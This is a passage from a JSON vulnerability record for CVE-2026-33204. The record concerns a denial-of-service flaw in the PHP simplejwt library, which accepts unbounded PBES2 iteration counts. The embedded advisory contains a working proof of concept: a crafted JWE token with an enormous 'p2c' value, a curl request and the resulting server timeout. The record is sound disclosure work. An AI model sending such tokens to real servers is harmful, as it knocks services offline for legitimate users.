8);\n\n return hash_pbkdf2($this->hash_alg, $password, $salt, $headers['p2c'], $length, true);\n }\n}\n?>\n```\n\nThe security flaw lies in the lack of input validation when handling JWEs that uses PBES2. \nA \"sanity ceiling\" is not set on the iteration count, which is the parameter known in the JWE specification as `p2c` ([RFC7518](https://datatracker.ietf.org/doc/html/rfc7518#section-4.8.1.2)). \nThe library calls `decryptKey()` with the untrusted input `$headers` which then use the PHP function `hash_pbkdf2()` with the user-supplied value `$headers['p2c']`.\n\nThis results in an algorithmic complexity denial-of-service (CPU exhaustion) because the PBKDF2 iteration count is fully attacker-controlled. \nBecause the header is processed before successful decryption and authentication, the attack can be triggered using an invalid JWE, meaning authentication is not required.\n\n## Proof of Concept\n\nSpin up a simple PHP server which accepts a JWE as input and tries to decrypt the user supplied JWE.\n\n```bash\nmkdir simplejwt-poc\ncd simplejwt-poc\ncomposer install\ncomposer require kelvinmo/simplejwt\nphp -S localhost:8000\n```\n\nThe content of `index.php`:\n\n```php\n 'PBES2-HS256+A128KW', 'enc' => 'A256CBC-HS512'];\n $plaintext = 'This is the plaintext I want to encrypt.';\n $jwe = new SimpleJWT\\JWE($headers, $plaintext);\n\n try {\n echo \"Encrypted JWE: \" . $jwe->encrypt($set);\n } catch (\\RuntimeException $e) {\n echo $e;\n }\n}\n\nelseif ($uri === '/decrypt' && $method === 'GET') {\n try {\n $jwe = $_GET['s'];\n $jwe = SimpleJWT\\JWE::decrypt($jwe, $set, 'PBES2-HS256+A128KW');\n } catch (SimpleJWT\\InvalidTokenException $e) {\n echo $e;\n }\n echo $jwe->getHeader('alg') . \"
\";\n echo $jwe->getHeader('enc') . \"
\";\n echo $jwe->getPlaintext() . \"
\";\n }\n\nelse {\n http_response_code(404);\n echo \"Route not found\";\n}\n\n?>\n```\n\nWe have to craft a JWE (even unsigned and unencrypted) with this header, notice the extremely large p2c value (more than 400 billion iterations):\n\n```json\n{\n \"alg\": \"PBES2-HS256+A128KW\",\n \"enc\": \"A128CBC-HS256\",\n \"p2s\": \"blablabla\",\n \"p2c\": 409123223136\n}\n```\n\nThe final JWE with poisoned header: `eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla`.\n\nNotice that only the header needs to be valid Base64URL JSON, the remaining JWE segments can contain arbitrary data.\n\nPerform the following request to the server (which tries to derive the PBES2 key):\n\n```bash\ncurl --path-as-is -i -s -k -X $'GET' \\\n -H $'Host: localhost:8000' \\\n $'http://localhost:8000/decrypt?s=eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla'\n```\n\nThe request blocks the worker until the PHP execution timeout is reached, shutting down the server:\n\n```console\n[Sun Mar 15 11:42:18 2026] PHP 8.4.11 Development Server (http://localhost:8000) started\n[Sun Mar 15 11:42:20 2026] 127.0.0.1:38532 Accepted\n\nFatal error: Maximum execution time of 30+2 seconds exceeded (terminated) in /home/edoardottt/hack/test/simplejwt-poc/vendor/kelvinmo/simplejwt/src/SimpleJWT/Crypt/KeyManagement/PBES2.php on line 168\n```\n\n## Impact\n\nAn attacker can send a crafted JWE with an extremely large `p2c` value to force the server to perform a very large number of PBKDF2 iterations. \nThis causes excessive CPU consumption during key derivation and blocks the request worker until execution limits are reached. \nRepeated requests can exhaust server resources and make the application unavailable to legitimate users.\n\n## Credits \n\nEdoardo Ottavianelli (@edoardottt)", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-xw36-67f8-339x.json?alt=media" }, { "category": "other", "text": "0.00044", "title": "EPSS" }, { "category": "other", "text": "4.0", "title": "NCSC Score" }, { "category": "other", "text": "There is cwe data available from source Nvd, There is product_remediation data available from source Redhat", "title": "NCSC Score top decreasing factors" }, { "category": "details", "text": "Severity: 2\n", "title": "Vendor assessment" } ], "product_status": { "known_affected": [ "CSAFPID-5878157", "CSAFPID-1508257", "CSAFPID-5891491", "CSAFPID-5891492", "CSAFPID-5891493", "CSAFPID-5891494", "CSAFPID-5912938", "CSAFPID-5912939", "CSAFPID-5912940", "CSAFPID-5912941", "CSAFPID-5912942", "CSAFPID-5912943", "CSAFPID-5912944", "CSAFPID-5912945", "CSAFPID-5912946", "CSAFPID-5912947", "CSAFPID-5912948", "CSAFPID-5912949", "CSAFPID-5912950", "CSAFPID-5912951", "CSAFPID-5912952", "CSAFPID-5912953", "CSAFPID-5912954", "CSAFPID-5912955", "CSAFPID-5912956", "CSAFPID-5912957", "CSAFPID-5912958", "CSAFPID-5912959", "CSAFPID-5912960", "CSAFPID-5912961", "CSAFPID-5912962", "CSAFPID-5912963", "CSAFPID-5912964", "CSAFPID-5912965", "CSAFPID-5912966", "CSAFPID-5912967", "CSAFPID-5912968", "CSAFPID-5912969", "CSAFPID-5912970", "CSAFPID-5912971", "CSAFPID-5912972", "CSAFPID-5912973", "CSAFPID-5912974", "CSAFPID-5912975", "CSAFPID-5912976", "CSAFPID-5912977", "CSAFPID-5912978", "CSAFPID-5912979" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://github.com/advisories/GHSA-xw36-67f8-339x" }, { "category": "external", "summary": "Source raw - github", "url": "https://api.github.com/advisories/GHSA-xw36-67f8-339x" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-xw36-67f8-339x" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33204" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33204.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33204.json" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-xw36-67f8-339x.json?alt=media" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/kelvinmo/simplejwt/security/advisories/GHSA-xw36-67f8-339x" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-xw36-67f8-339x" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/kelvinmo/simplejwt/releases/tag/v1.1.1" }, { "category": "external", "summary": "Reference - redhat", "url": "https://www.cve.org/CVERecord?id=CVE-2026-33204" }, { "category": "external", "summary": "Reference - github; osv; redhat", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33204" } ], "remediations": [ { "category": "mitigation", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.", "product_ids": [ "CSAFPID-1508257", "CSAFPID-5891491", "CSAFPID-5891492", "CSAFPID-5891493", "CSAFPID-5891494" ] } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-1508257", "CSAFPID-5878157", "CSAFPID-5891491", "CSAFPID-5891492", "CSAFPID-5891493", "CSAFPID-5891494", "CSAFPID-5912938", "CSAFPID-5912939", "CSAFPID-5912940", "CSAFPID-5912941", "CSAFPID-5912942", "CSAFPID-5912943", "CSAFPID-5912944", "CSAFPID-5912945", "CSAFPID-5912946", "CSAFPID-5912947", "CSAFPID-5912948", "CSAFPID-5912949", "CSAFPID-5912950", "CSAFPID-5912951", "CSAFPID-5912952", "CSAFPID-5912953", "CSAFPID-5912954", "CSAFPID-5912955", "CSAFPID-5912956", "CSAFPID-5912957", "CSAFPID-5912958", "CSAFPID-5912959", "CSAFPID-5912960", "CSAFPID-5912961", "CSAFPID-5912962", "CSAFPID-5912963", "CSAFPID-5912964", "CSAFPID-5912965", "CSAFPID-5912966", "CSAFPID-5912967", "CSAFPID-5912968", "CSAFPID-5912969", "CSAFPID-5912970", "CSAFPID-5912971", "CSAFPID-5912972", "CSAFPID-5912973", "CSAFPID-5912974", "CSAFPID-5912975", "CSAFPID-5912976", "CSAFPID-5912977", "CSAFPID-5912978", "CSAFPID-5912979" ] } ], "title": "CVE-2026-33204" } ] }